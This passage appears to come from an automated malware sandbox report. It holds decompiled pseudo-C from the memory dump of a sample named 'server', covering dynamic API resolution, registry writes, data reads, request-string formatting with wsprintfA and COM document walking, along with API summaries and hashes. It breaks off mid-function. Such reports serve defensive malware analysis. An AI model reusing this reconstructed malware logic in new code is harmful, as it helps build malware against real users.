              					_t26 =  *0x2cea348; // 0x256d5a8
              					_t2 = _t26 + 0x2ceb85c; // 0x7243775a
              					_v8 = 0x7f;
              					_t28 = GetProcAddress(_t48, _t2);
              					 *(_t54 + 0xc) = _t28;
              					if(_t28 == 0) {
              						L8:
              						E02CE61DA(_t54);
              					} else {
              						_t30 =  *0x2cea348; // 0x256d5a8
              						_t5 = _t30 + 0x2ceb849; // 0x614d775a
              						_t32 = GetProcAddress(_t48, _t5);
              						 *(_t54 + 0x10) = _t32;
              						if(_t32 == 0) {
              							goto L8;
              						} else {
              							_t33 =  *0x2cea348; // 0x256d5a8
              							_t7 = _t33 + 0x2ceb72b; // 0x6e55775a
              							_t35 = GetProcAddress(_t48, _t7);
              							 *(_t54 + 0x14) = _t35;
              							if(_t35 == 0) {
              								goto L8;
              							} else {
              								_t36 =  *0x2cea348; // 0x256d5a8
              								_t9 = _t36 + 0x2ceb883; // 0x4e6c7452
              								_t38 = GetProcAddress(_t48, _t9);
              								 *(_t54 + 0x18) = _t38;
              								if(_t38 == 0) {
              									goto L8;
              								} else {
              									_t39 =  *0x2cea348; // 0x256d5a8
              									_t11 = _t39 + 0x2ceb87b; // 0x6c43775a
              									_t41 = GetProcAddress(_t48, _t11);
              									 *(_t54 + 0x1c) = _t41;
              									if(_t41 == 0) {
              										goto L8;
              									} else {
              										 *((intOrPtr*)(_t54 + 4)) = _a4;
              										 *((intOrPtr*)(_t54 + 8)) = 0x40;
              										_t44 = E02CE7A08(_t54, _a8);
              										_v8 = _t44;
              										if(_t44 != 0) {
              											goto L8;
              										} else {
              											 *_a12 = _t54;
              										}
              									}
              								}
              							}
              						}
              					}
              				}
              				return _v8;
              			}


















              0x02ce6c08
              0x02ce6c0c
              0x02ce6cce
              0x02ce6c12
              0x02ce6c12
              0x02ce6c17
              0x02ce6c2a
              0x02ce6c2c
              0x02ce6c31
              0x02ce6c39
              0x02ce6c40
              0x02ce6c42
              0x02ce6c47
              0x02ce6cc6
              0x02ce6cc7
              0x02ce6c49
              0x02ce6c49
              0x02ce6c4e
              0x02ce6c56
              0x02ce6c58
              0x02ce6c5d
              0x00000000
              0x02ce6c5f
              0x02ce6c5f
              0x02ce6c64
              0x02ce6c6c
              0x02ce6c6e
              0x02ce6c73
              0x00000000
              0x02ce6c75
              0x02ce6c75
              0x02ce6c7a
              0x02ce6c82
              0x02ce6c84
              0x02ce6c89
              0x00000000
              0x02ce6c8b
              0x02ce6c8b
              0x02ce6c90
              0x02ce6c98
              0x02ce6c9a
              0x02ce6c9f
              0x00000000
              0x02ce6ca1
              0x02ce6ca7
              0x02ce6cac
              0x02ce6cb3
              0x02ce6cb8
              0x02ce6cbd
              0x00000000
              0x02ce6cbf
              0x02ce6cc2
              0x02ce6cc2
              0x02ce6cbd
              0x02ce6c9f
              0x02ce6c89
              0x02ce6c73
              0x02ce6c5d
              0x02ce6c47
              0x02ce6cdc

              APIs
                • Part of subcall function 02CE33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02CE62F6), ref: 02CE33E8
              • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02CE37FB,?,?,?,?,00000000,00000000), ref: 02CE6C1E
              • GetProcAddress.KERNEL32(00000000,7243775A), ref: 02CE6C40
              • GetProcAddress.KERNEL32(00000000,614D775A), ref: 02CE6C56
              • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02CE6C6C
              • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02CE6C82
              • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02CE6C98
                • Part of subcall function 02CE7A08: memset.NTDLL ref: 02CE7A87
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: AddressProc$AllocateHandleHeapModulememset
              • String ID:
              • API String ID: 1886625739-0
              • Opcode ID: 8c4daa50c03f7436cb48bbdffe37214461746d83e7b19a1d4e958e4265583ad3
              • Instruction ID: 8a51edc9d0a49ca716ca5cd6c74af4169f67e3b1af977e8741aef7513b05c40e
              • Opcode Fuzzy Hash: 8c4daa50c03f7436cb48bbdffe37214461746d83e7b19a1d4e958e4265583ad3
              • Instruction Fuzzy Hash: 4E212BB0610B0AEFDF21DF6ACA44E6AB7ECEF543087114925E506CB611E770EA08CB60
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 88%
              			E02CE4C94(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
              				signed int _v8;
              				char _v12;
              				signed int* _v16;
              				char _v284;
              				void* __esi;
              				char* _t59;
              				intOrPtr* _t60;
              				intOrPtr _t64;
              				char _t65;
              				intOrPtr _t68;
              				intOrPtr _t69;
              				intOrPtr _t71;
              				void* _t73;
              				signed int _t81;
              				void* _t91;
              				void* _t92;
              				char _t98;
              				signed int* _t100;
              				intOrPtr* _t101;
              				void* _t102;
              
              				_t92 = __ecx;
              				_v8 = _v8 & 0x00000000;
              				_t98 = _a16;
              				if(_t98 == 0) {
              					__imp__( &_v284,  *0x2cea3dc);
              					_t91 = 0x80000002;
              					L6:
              					_t59 = E02CE6536( &_v284,  &_v284);
              					_a8 = _t59;
              					if(_t59 == 0) {
              						_v8 = 8;
              						L29:
              						_t60 = _a20;
              						if(_t60 != 0) {
              							 *_t60 =  *_t60 + 1;
              						}
              						return _v8;
              					}
              					_t101 = _a24;
              					if(E02CE313F(_t92, _t97, _t101, _t91, _t59) != 0) {
              						L27:
              						E02CE61DA(_a8);
              						goto L29;
              					}
              					_t64 =  *0x2cea318; // 0x5259df8
              					_t16 = _t64 + 0xc; // 0x5259f1a
              					_t65 = E02CE6536(_t64,  *_t16);
              					_a24 = _t65;
              					if(_t65 == 0) {
              						L14:
              						_t29 = _t101 + 0x14; // 0x102
              						_t33 = _t101 + 0x10; // 0x3d02ce90
              						if(E02CE7767(_t97,  *_t33, _t91, _a8,  *0x2cea3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
              							_t68 =  *0x2cea348; // 0x256d5a8
              							if(_t98 == 0) {
              								_t35 = _t68 + 0x2cebb5a; // 0x4d4c4b48
              								_t69 = _t35;
              							} else {
              								_t34 = _t68 + 0x2cebbac; // 0x55434b48
              								_t69 = _t34;
              							}
              							if(E02CE7238(_t69,  *0x2cea3d4,  *0x2cea3d8,  &_a24,  &_a16) == 0) {
              								if(_t98 == 0) {
              									_t71 =  *0x2cea348; // 0x256d5a8
              									_t44 = _t71 + 0x2ceb332; // 0x74666f53
              									_t73 = E02CE6536(_t44, _t44);
              									_t99 = _t73;
              									if(_t73 == 0) {
              										_v8 = 8;
              									} else {
              										_t47 = _t101 + 0x10; // 0x3d02ce90
              										E02CE5B0E( *_t47, _t91, _a8,  *0x2cea3d8, _a24);
              										_t49 = _t101 + 0x10; // 0x3d02ce90
              										E02CE5B0E( *_t49, _t91, _t99,  *0x2cea3d0, _a16);
              										E02CE61DA(_t99);
              									}
              								} else {
              									_t40 = _t101 + 0x10; // 0x3d02ce90
              									E02CE5B0E( *_t40, _t91, _a8,  *0x2cea3d8, _a24);
              									_t43 = _t101 + 0x10; // 0x3d02ce90
              									E02CE5B0E( *_t43, _t91, _a8,  *0x2cea3d0, _a16);
              								}
              								if( *_t101 != 0) {
              									E02CE61DA(_a24);
              								} else {
              									 *_t101 = _a16;
              								}
              							}
              						}
              						goto L27;
              					}
              					_t21 = _t101 + 0x10; // 0x3d02ce90
              					_t81 = E02CE58BD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
              					if(_t81 == 0) {
              						_t100 = _v16;
              						if(_v12 == 0x28) {
              							 *_t100 =  *_t100 & _t81;
              							_t26 = _t101 + 0x10; // 0x3d02ce90
              							E02CE7767(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
              						}
              						E02CE61DA(_t100);
              						_t98 = _a16;
              					}
              					E02CE61DA(_a24);
              					goto L14;
              				}
              				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
              					goto L29;
              				} else {
              					_t97 = _a8;
              					E02CE7AB0(_t98, _a8,  &_v284);
              					__imp__(_t102 + _t98 - 0x117,  *0x2cea3dc);
              					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
              					_t91 = 0x80000003;
              					goto L6;
              				}
              			}























              0x02ce4c94
              0x02ce4c9d
              0x02ce4ca4
              0x02ce4ca9
              0x02ce4d16
              0x02ce4d1c
              0x02ce4d21
              0x02ce4d28
              0x02ce4d2d
              0x02ce4d32
              0x02ce4e9d
              0x02ce4ea4
              0x02ce4ea4
              0x02ce4ea9
              0x02ce4eab
              0x02ce4eab
              0x02ce4eb4
              0x02ce4eb4
              0x02ce4d38
              0x02ce4d44
              0x02ce4e93
              0x02ce4e96
              0x00000000
              0x02ce4e96
              0x02ce4d4a
              0x02ce4d4f
              0x02ce4d52
              0x02ce4d57
              0x02ce4d5c
              0x02ce4da5
              0x02ce4da5
              0x02ce4db8
              0x02ce4dc2
              0x02ce4dc8
              0x02ce4dcf
              0x02ce4dd9
              0x02ce4dd9
              0x02ce4dd1
              0x02ce4dd1
              0x02ce4dd1
              0x02ce4dd1
              0x02ce4dfb
              0x02ce4e03
              0x02ce4e31
              0x02ce4e36
              0x02ce4e3d
              0x02ce4e42
              0x02ce4e46
              0x02ce4e78
              0x02ce4e48
              0x02ce4e55
              0x02ce4e58
              0x02ce4e68
              0x02ce4e6b
              0x02ce4e71
              0x02ce4e71
              0x02ce4e05
              0x02ce4e12
              0x02ce4e15
              0x02ce4e27
              0x02ce4e2a
              0x02ce4e2a
              0x02ce4e82
              0x02ce4e8e
              0x02ce4e84
              0x02ce4e87
              0x02ce4e87
              0x02ce4e82
              0x02ce4dfb
              0x00000000
              0x02ce4dc2
              0x02ce4d6b
              0x02ce4d6e
              0x02ce4d75
              0x02ce4d7b
              0x02ce4d7e
              0x02ce4d80
              0x02ce4d8c
              0x02ce4d8f
              0x02ce4d8f
              0x02ce4d95
              0x02ce4d9a
              0x02ce4d9a
              0x02ce4da0
              0x00000000
              0x02ce4da0
              0x02ce4cae
              0x00000000
              0x02ce4cd5
              0x02ce4cd5
              0x02ce4ce1
              0x02ce4cf4
              0x02ce4cfa
              0x02ce4d02
              0x00000000
              0x02ce4d02

              APIs
              • StrChrA.SHLWAPI(02CE6A76,0000005F,00000000,00000000,00000104), ref: 02CE4CC7
              • lstrcpy.KERNEL32(?,?), ref: 02CE4CF4
                • Part of subcall function 02CE6536: lstrlen.KERNEL32(?,00000000,05259DF8,00000000,02CE6F0A,0525A01B,43175AC3,?,?,?,?,43175AC3,00000005,02CEA00C,4D283A53,?), ref: 02CE653D
                • Part of subcall function 02CE6536: mbstowcs.NTDLL ref: 02CE6566
                • Part of subcall function 02CE6536: memset.NTDLL ref: 02CE6578
                • Part of subcall function 02CE5B0E: lstrlenW.KERNEL32(?,?,?,02CE4E5D,3D02CE90,80000002,02CE6A76,02CE57D1,74666F53,4D4C4B48,02CE57D1,?,3D02CE90,80000002,02CE6A76,?), ref: 02CE5B33
                • Part of subcall function 02CE61DA: RtlFreeHeap.NTDLL(00000000,00000000,02CE6383,00000000,?,00000000,00000000), ref: 02CE61E6
              • lstrcpy.KERNEL32(?,00000000), ref: 02CE4D16
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
              • String ID: ($\
              • API String ID: 3924217599-1512714803
              • Opcode ID: 461b2bad158b6fb871b979975b7d7face02e2064bdb7d0327a04f0bbd52b66b3
              • Instruction ID: 29609ef9002f5f10b07e0a9acc2385d23603d564565848b1478103cc4c76c1e5
              • Opcode Fuzzy Hash: 461b2bad158b6fb871b979975b7d7face02e2064bdb7d0327a04f0bbd52b66b3
              • Instruction Fuzzy Hash: E5514876500249EFDF26AFA0DD40EAA7BBAEF48354F108918FA1697160D731DA25EF10
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 39%
              			E02CE454F(void* __eax, void* __ecx) {
              				char _v8;
              				void* _v12;
              				intOrPtr _v16;
              				char _v20;
              				void* __esi;
              				intOrPtr _t36;
              				intOrPtr* _t37;
              				intOrPtr* _t39;
              				void* _t53;
              				long _t58;
              				void* _t59;
              
              				_t53 = __ecx;
              				_t59 = __eax;
              				_t58 = 0;
              				ResetEvent( *(__eax + 0x1c));
              				_push( &_v8);
              				_push(4);
              				_push( &_v20);
              				_push( *((intOrPtr*)(_t59 + 0x18)));
              				if( *0x2cea160() != 0) {
              					L5:
              					if(_v8 == 0) {
              						 *((intOrPtr*)(_t59 + 0x30)) = 0;
              						L21:
              						return _t58;
              					}
              					 *0x2cea174(0, 1,  &_v12);
              					if(0 != 0) {
              						_t58 = 8;
              						goto L21;
              					}
              					_t36 = E02CE33DC(0x1000);
              					_v16 = _t36;
              					if(_t36 == 0) {
              						_t58 = 8;
              						L18:
              						_t37 = _v12;
              						 *((intOrPtr*)( *_t37 + 8))(_t37);
              						goto L21;
              					}
              					_push(0);
              					_push(_v8);
              					_push( &_v20);
              					while(1) {
              						_t39 = _v12;
              						_t56 =  *_t39;
              						 *((intOrPtr*)( *_t39 + 0x10))(_t39);
              						ResetEvent( *(_t59 + 0x1c));
              						_push( &_v8);
              						_push(0x1000);
              						_push(_v16);
              						_push( *((intOrPtr*)(_t59 + 0x18)));
              						if( *0x2cea160() != 0) {
              							goto L13;
              						}
              						_t58 = GetLastError();
              						if(_t58 != 0x3e5) {
              							L15:
              							E02CE61DA(_v16);
              							if(_t58 == 0) {
              								_t58 = E02CE2B18(_v12, _t59);
              							}
              							goto L18;
              						}
              						_t58 = E02CE16B2( *(_t59 + 0x1c), _t56, 0xffffffff);
              						if(_t58 != 0) {
              							goto L15;
              						}
              						_t58 =  *((intOrPtr*)(_t59 + 0x28));
              						if(_t58 != 0) {
              							goto L15;
              						}
              						L13:
              						_t58 = 0;
              						if(_v8 == 0) {
              							goto L15;
              						}
              						_push(0);
              						_push(_v8);
              						_push(_v16);
              					}
              				}
              				_t58 = GetLastError();
              				if(_t58 != 0x3e5) {
              					L4:
              					if(_t58 != 0) {
              						goto L21;
              					}
              					goto L5;
              				}
              				_t58 = E02CE16B2( *(_t59 + 0x1c), _t53, 0xffffffff);
              				if(_t58 != 0) {
              					goto L21;
              				}
              				_t58 =  *((intOrPtr*)(_t59 + 0x28));
              				goto L4;
              			}














              0x02ce454f
              0x02ce455e
              0x02ce4563
              0x02ce4565
              0x02ce456a
              0x02ce456b
              0x02ce4570
              0x02ce4571
              0x02ce457c
              0x02ce45ad
              0x02ce45b2
              0x02ce4675
              0x02ce4678
              0x02ce467e
              0x02ce467e
              0x02ce45bf
              0x02ce45c7
              0x02ce4672
              0x00000000
              0x02ce4672
              0x02ce45d2
              0x02ce45d7
              0x02ce45dc
              0x02ce4664
              0x02ce4665
              0x02ce4665
              0x02ce466b
              0x00000000
              0x02ce466b
              0x02ce45e2
              0x02ce45e4
              0x02ce45ea
              0x02ce45eb
              0x02ce45eb
              0x02ce45ee
              0x02ce45f1
              0x02ce45f7
              0x02ce45fc
              0x02ce45fd
              0x02ce4602
              0x02ce4605
              0x02ce4610
              0x00000000
              0x00000000
              0x02ce4618
              0x02ce4620
              0x02ce4649
              0x02ce464c
              0x02ce4653
              0x02ce465e
              0x02ce465e
              0x00000000
              0x02ce4653
              0x02ce462c
              0x02ce4630
              0x00000000
              0x00000000
              0x02ce4632
              0x02ce4637
              0x00000000
              0x00000000
              0x02ce4639
              0x02ce4639
              0x02ce463e
              0x00000000
              0x00000000
              0x02ce4640
              0x02ce4641
              0x02ce4644
              0x02ce4644
              0x02ce45eb
              0x02ce4584
              0x02ce458c
              0x02ce45a5
              0x02ce45a7
              0x00000000
              0x00000000
              0x00000000
              0x02ce45a7
              0x02ce4598
              0x02ce459c
              0x00000000
              0x00000000
              0x02ce45a2
              0x00000000

              APIs
              • ResetEvent.KERNEL32(?), ref: 02CE4565
              • GetLastError.KERNEL32 ref: 02CE457E
                • Part of subcall function 02CE16B2: WaitForMultipleObjects.KERNEL32(00000002,02CE7C47,00000000,02CE7C47,?,?,?,02CE7C47,0000EA60), ref: 02CE16CD
              • ResetEvent.KERNEL32(?), ref: 02CE45F7
              • GetLastError.KERNEL32 ref: 02CE4612
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: ErrorEventLastReset$MultipleObjectsWait
              • String ID: @MqtNqt
              • API String ID: 2394032930-2883916605
              • Opcode ID: c835dae0c8d6aa40c37ab6af5cb19407678648b1f63953a8dd20060a086feec3
              • Instruction ID: 924557da33dcc4b0e5e91aa28cffc11cf8b276b28e214f9bdd4ab086ab7e3972
              • Opcode Fuzzy Hash: c835dae0c8d6aa40c37ab6af5cb19407678648b1f63953a8dd20060a086feec3
              • Instruction Fuzzy Hash: 0731AE72A40604EFCF329BA5CC44F6EB7BABFC4364B150668E516A7190EB70EA459B10
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 37%
              			E02CE607C() {
              				void* _v0;
              				void** _t3;
              				void** _t5;
              				void** _t7;
              				void** _t8;
              				void* _t10;
              
              				_t3 =  *0x2cea3cc; // 0x5259600
              				__imp__( &(_t3[0x10]));
              				while(1) {
              					_t5 =  *0x2cea3cc; // 0x5259600
              					_t1 =  &(_t5[0x16]); // 0x0
              					if( *_t1 == 0) {
              						break;
              					}
              					Sleep(0xa);
              				}
              				_t7 =  *0x2cea3cc; // 0x5259600
              				_t10 =  *_t7;
              				if(_t10 != 0 && _t10 != 0x2ceb142) {
              					HeapFree( *0x2cea2d8, 0, _t10);
              					_t7 =  *0x2cea3cc; // 0x5259600
              				}
              				 *_t7 = _v0;
              				_t8 =  &(_t7[0x10]);
              				__imp__(_t8);
              				return _t8;
              			}









              0x02ce607c
              0x02ce6085
              0x02ce6095
              0x02ce6095
              0x02ce609a
              0x02ce609f
              0x00000000
              0x00000000
              0x02ce608f
              0x02ce608f
              0x02ce60a1
              0x02ce60a6
              0x02ce60aa
              0x02ce60bd
              0x02ce60c3
              0x02ce60c3
              0x02ce60cc
              0x02ce60ce
              0x02ce60d2
              0x02ce60d8

              APIs
              • RtlEnterCriticalSection.NTDLL(052595C0), ref: 02CE6085
              • Sleep.KERNEL32(0000000A), ref: 02CE608F
              • HeapFree.KERNEL32(00000000), ref: 02CE60BD
              • RtlLeaveCriticalSection.NTDLL(052595C0), ref: 02CE60D2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
              • String ID: Uqt
              • API String ID: 58946197-2320327147
              • Opcode ID: 0b4ffb74c607f5eb933240b4d99b23b338cf90e9087956ef0ed4f538d2bbbade
              • Instruction ID: 01a53b7af592fe40c09c001ff50aeb581e7a576a249d34f1361d28820cccee7d
              • Opcode Fuzzy Hash: 0b4ffb74c607f5eb933240b4d99b23b338cf90e9087956ef0ed4f538d2bbbade
              • Instruction Fuzzy Hash: 5BF0DA74A90201EFEF14CF55D849B257BB5AB98315B184A04E907DF390C734E864CB69
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 85%
              			E02CE35D2(intOrPtr* __eax, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
              				void* _v8;
              				char _v48;
              				void* __edi;
              				intOrPtr _t22;
              				intOrPtr _t30;
              				intOrPtr _t34;
              				intOrPtr* _t42;
              				void* _t43;
              				void* _t46;
              				intOrPtr* _t48;
              				void* _t49;
              				intOrPtr _t51;
              
              				_t42 = _a16;
              				_t48 = __eax;
              				_t22 =  *0x2cea348; // 0x256d5a8
              				_t2 = _t22 + 0x2ceb7bb; // 0x657a6973
              				wsprintfA( &_v48, _t2,  *__eax,  *_t42);
              				if( *0x2cea2ec >= 5) {
              					_t30 = E02CE3CE0(_a4, _t43, _t46,  &_v48,  &_v8,  &_a16);
              					L5:
              					_a4 = _t30;
              					L6:
              					if(_a4 != 0) {
              						L9:
              						 *0x2cea2ec =  *0x2cea2ec + 1;
              						L10:
              						return _a4;
              					}
              					_t50 = _a16;
              					 *_t48 = _a16;
              					_t49 = _v8;
              					 *_t42 = E02CE56B9(_t50, _t49);
              					_t34 = E02CE77A5(_t49, _t50);
              					if(_t34 != 0) {
              						 *_a8 = _t49;
              						 *_a12 = _t34;
              						if( *0x2cea2ec < 5) {
              							 *0x2cea2ec =  *0x2cea2ec & 0x00000000;
              						}
              						goto L10;
              					}
              					_a4 = 0xbf;
              					E02CE63F6();
              					HeapFree( *0x2cea2d8, 0, _t49);
              					goto L9;
              				}
              				_t51 =  *0x2cea3e0; // 0x5259c00
              				if(RtlAllocateHeap( *0x2cea2d8, 0, 0x800) == 0) {
              					_a4 = 8;
              					goto L6;
              				}
              				_t30 = E02CE2B91(_a4, _t51,  &_v48,  &_v8,  &_a16, _t37);
              				goto L5;
              			}















              0x02ce35d9
              0x02ce35e0
              0x02ce35e4
              0x02ce35e9
              0x02ce35f4
              0x02ce3604
              0x02ce3653
              0x02ce3658
              0x02ce3658
              0x02ce365b
              0x02ce365f
              0x02ce3699
              0x02ce3699
              0x02ce369f
              0x02ce36a6
              0x02ce36a6
              0x02ce3661
              0x02ce3664
              0x02ce3666
              0x02ce3673
              0x02ce3675
              0x02ce367c
              0x02ce36b3
              0x02ce36b8
              0x02ce36ba
              0x02ce36bc
              0x02ce36bc
              0x00000000
              0x02ce36ba
              0x02ce367e
              0x02ce3685
              0x02ce3693
              0x00000000
              0x02ce3693
              0x02ce3606
              0x02ce3621
              0x02ce363b
              0x00000000
              0x02ce363b
              0x02ce3634
              0x00000000

              APIs
              • wsprintfA.USER32 ref: 02CE35F4
              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02CE3619
                • Part of subcall function 02CE2B91: GetTickCount.KERNEL32 ref: 02CE2BA8
                • Part of subcall function 02CE2B91: wsprintfA.USER32 ref: 02CE2BF5
                • Part of subcall function 02CE2B91: wsprintfA.USER32 ref: 02CE2C12
                • Part of subcall function 02CE2B91: wsprintfA.USER32 ref: 02CE2C34
                • Part of subcall function 02CE2B91: wsprintfA.USER32 ref: 02CE2C5B
                • Part of subcall function 02CE2B91: wsprintfA.USER32 ref: 02CE2C7C
                • Part of subcall function 02CE2B91: wsprintfA.USER32 ref: 02CE2CA7
                • Part of subcall function 02CE2B91: HeapFree.KERNEL32(00000000,?), ref: 02CE2CBA
              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 02CE3693
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.568811195.0000000002CE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02CE0000, based on PE: true
              • Associated: 00000000.00000002.568806289.0000000002CE0000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568818365.0000000002CE9000.00000002.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568822120.0000000002CEA000.00000004.10000000.00040000.00000000.sdmpDownload File
              • Associated: 00000000.00000002.568826250.0000000002CEC000.00000002.10000000.00040000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_2ce0000_server.jbxd
              Similarity
              • API ID: wsprintf$Heap$Free$AllocateCountTick
              • String ID: Uqt
              • API String ID: 1307794992-2320327147
              • Opcode ID: 29bd1097ec59c7498bb370cafc8a9e75993367ecfc12333c6ee17d9cf3ef70e9
              • Instruction ID: 40a13f4fb3eea1c632a8deef8656d5e883553158724944e0f156a7c8c9723c0a
              • Opcode Fuzzy Hash: 29bd1097ec59c7498bb370cafc8a9e75993367ecfc12333c6ee17d9cf3ef70e9
              • Instruction Fuzzy Hash: 37312FB1940148EFCF01DF65D884BEA7BBDFB48355F108562E906AB240D730EA54DFA1
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 46%
              			E02CE6CDF(intOrPtr* __eax) {
              				void* _v8;
              				WCHAR* _v12;
              				void* _v16;
              				char _v20;
              				void* _v24;
              				intOrPtr _v28;
              				void* _v32;
              				intOrPtr _v40;
              				short _v48;
              				intOrPtr _v56;
              				short _v64;
              				intOrPtr* _t54;
              				intOrPtr* _t56;
              				intOrPtr _t57;
              				intOrPtr* _t58;
              				intOrPtr* _t60;
              				void* _t61;
              				intOrPtr* _t63;
              				intOrPtr* _t65;
              				short _t67;
              				intOrPtr* _t68;
              				intOrPtr* _t70;
              				intOrPtr* _t72;
              				intOrPtr* _t75;
              				intOrPtr* _t77;
              				intOrPtr _t79;
              				intOrPtr* _t83;
              				intOrPtr* _t87;
              				intOrPtr _t103;
              				intOrPtr _t109;
              				void* _t118;
              				void* _t122;
              				void* _t123;
              				intOrPtr _t130;
              
              				_t123 = _t122 - 0x3c;
              				_push( &_v8);
              				_push(__eax);
              				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
              				if(_t118 >= 0) {
              					_t54 = _v8;
              					_t103 =  *0x2cea348; // 0x256d5a8
              					_t5 = _t103 + 0x2ceb038; // 0x3050f485
              					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
              					_t56 = _v8;
              					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
              					if(_t118 >= 0) {
              						__imp__#2(0x2ce9284);
              						_v28 = _t57;
              						if(_t57 == 0) {
              							_t118 = 0x8007000e;
              						} else {
              							_t60 = _v32;
              							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
              							_t87 = __imp__#6;
              							_t118 = _t61;
              							if(_t118 >= 0) {
              								_t63 = _v24;
              								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
              								if(_t118 >= 0) {
              									_t130 = _v20;
              									if(_t130 != 0) {
              										_t67 = 3;
              										_v64 = _t67;
              										_v48 = _t67;
              										_v56 = 0;
              										_v40 = 0;
              										if(_t130 > 0) {
              											while(1) {
              												_t68 = _v24;
              												asm("movsd");
              												asm("movsd");
              												asm("movsd");
              												asm("movsd");
              												_t123 = _t123;
              												asm("movsd");
              												asm("movsd");
              												asm("movsd");
              												asm("movsd");
              												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
              												if(_t118 < 0) {
              													goto L16;
              												}
              												_t70 = _v8;
              												_t109 =  *0x2cea348; // 0x256d5a8
              												_t28 = _t109 + 0x2ceb0e4; // 0x3050f1ff
              												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
              												if(_t118 >= 0) {
              													_t75 = _v16;
              													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
              													if(_t118 >= 0 && _v12 != 0) {
              														_t79 =  *0x2cea348; // 0x256d5a8
              														_t33 = _t79 + 0x2ceb078; // 0x76006f
              														if(lstrcmpW(_v12, _t33) == 0) {
              															_t83 = _v16;
              															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
              														}
              														 *_t87(_v12);
              													}
              													_t77 = _v16;
              													 *((intOrPtr*)( *_t77 + 8))(_t77);
              												}
              												_t72 = _v8;
              												 *((intOrPtr*)( *_t72 + 8))(_t72);
              												_v40 = _v40 + 1;
              												if(_v40 < _v20) {
              													continue;
              												}
              												goto L16;
              											}
              										}
              									}
              								}
              								L16:
              								_t65 = _v24;
